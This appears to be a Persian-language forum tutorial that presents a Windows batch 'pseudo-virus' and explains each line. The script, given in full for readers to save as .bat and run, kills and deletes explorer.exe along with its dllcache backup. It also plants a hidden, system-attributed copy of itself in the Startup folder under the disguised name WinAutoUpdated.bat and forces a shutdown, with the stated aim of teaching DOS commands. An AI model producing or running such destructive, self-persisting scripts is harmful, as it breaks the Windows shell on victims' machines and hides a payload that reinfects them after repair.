این شبه ویروس رو باید تو Notepad کپی بعد با فرمت .bat یا .cmd ذخیره کنید(خوب اینو که همه بلدن)
البته ممکنه بعضی از شما بگین این حتی شبیه یه ویروس عصر حاظر هم نیست . اصلا ویروس نیست (مثل خود من).
ولی چون آثار مخربی داره همون شبه ویروس می خوانیمش. و گفتم قصدم هم فقط آشنایی شما با دیگر فرامین داس و پیشرفته ویندوزه.
کار این شبه ویروس چیه:
این شبه ویروس فایل explorer.exe روی کلا از روی سیستم شما پاک می کنه (البته اگه backup دیگه روی سیستم نباشه).
و تنها راهشم air کردن ویندوز باcd ویندوز که فکر اینجاشم کردم.
اگر می خواهید بدونید بعد اجرای این ویروس چه اتفاقی می افته فقط کافیه این فرمان رو در خط فرمان وارد کنید.
taskkill /F /IM explorer.exe
و برای برگرداندن به حالت اول این فرمان رو وارد کنید.
%systemroot%\explorer.exe
هیچ خطری هم نداره (امتحان کنید)
ولی بعد اینکه این شبه ویروس اجرا بشه فایل explorer.exe هم کامل پاک می شه برای همیشه یا زمانی که تعمیر بشه همینجوری می مونه
و اما ویروس ما
@echo off
taskkill /F /IM explorer.exe > nul
attrib -s -h %systemroot%\system32\dllcache > nul
del /Q %systemroot%\explorer.exe > nul
del /Q %systemroot%\system32\dllcache\explorer.exe > nul
copy \readme.bat "%USERPROFILE%\Start Menu\Programs\Startup\WinAutoUpdated.bat" > nul
attrib +h +s "%USERPROFILE%\Start Menu\Programs\Startup\WinAutoUpdated.bat" > nul
shutdown -s -t 0
برسی کد شبه ویروس:
خط اول: این دستور برای این هست که فرامین خط فرمان در صفحه نمایش ظاهر نشن.
خط دوم: فرمان taskkill یکی از فرامین پیشرفته ویندوزهای سری NT هست. کارش اینه که یه فایل یا یه برنامه در حال اجرا رو از حافظه خارج می کنه یا به عبارتی می کشه(kill).
پارامتر /F : برای سرعت بخشیدن به این عمل هست
پارامتر /IM : اگر شما وارد Windows Task Manager بشین به به سربرگ Processes برین لیستی از از برنامه ها و فایلهای سیستمی ویندوز رو می بینید که در رم قرار دارد و اگه مثلا ما به خوایم فایل explorer.exe رو خارج کنیم باید اسمشو جلوی این پارامتر قرار دهید.
نکته : فرمان > nul که در جلوی هر خط دیده نی شه برای اینه که نتیجه که از خط فرمان به صفحه نمایش فرستاده می شه دیده نشه.
خط سوم : فرمان attrib یکی از فرمان های داس هست که می تویند خصوصیات Read-only ، Hidden ، Archive و System یک فایل رو تغییر بدین.
پارامتر –h یعنی Hidden
پارامتر –s هم یعنی System (این خصویات فقط برای فایل های سیستمی هست که در واقع دو بار مخفی می شن)
خط چهارم و پنجم :فرمان del هم که خیلی تابلوی . باهاش یک فایل یا یه دسته فایل رو می شه پاک کرد.
خط شش: فرمان کپی که یک کپی از یک فایل در جای دیگه می گیره. اینجا ما از فایلمون یه کپی به نام WinAutoUpdated.bat در شاخه startup کاربر قرار می دیم که اگه یه وقت ویندوزو تعمیر کر دوبار اجرا بشه.
خط هفتم: فرمان attrib رو قبلا توضیح دادم. فقط بگم که اینجا ما فایمون رو از نوع سیستمی می کنیم که از دید کاربر پنهان بشه.
خط هشتم : فرمان shutdown هم کم که دیگه الان همه میش ناسن و نیازی به توضیح نداره فقط برای اونایی که نمی دونن بگم که برای خواموش کردن سیستم.
Notepad، شبه ویروس، bat یا .cmd ذخیره کنید، Processes، آموزش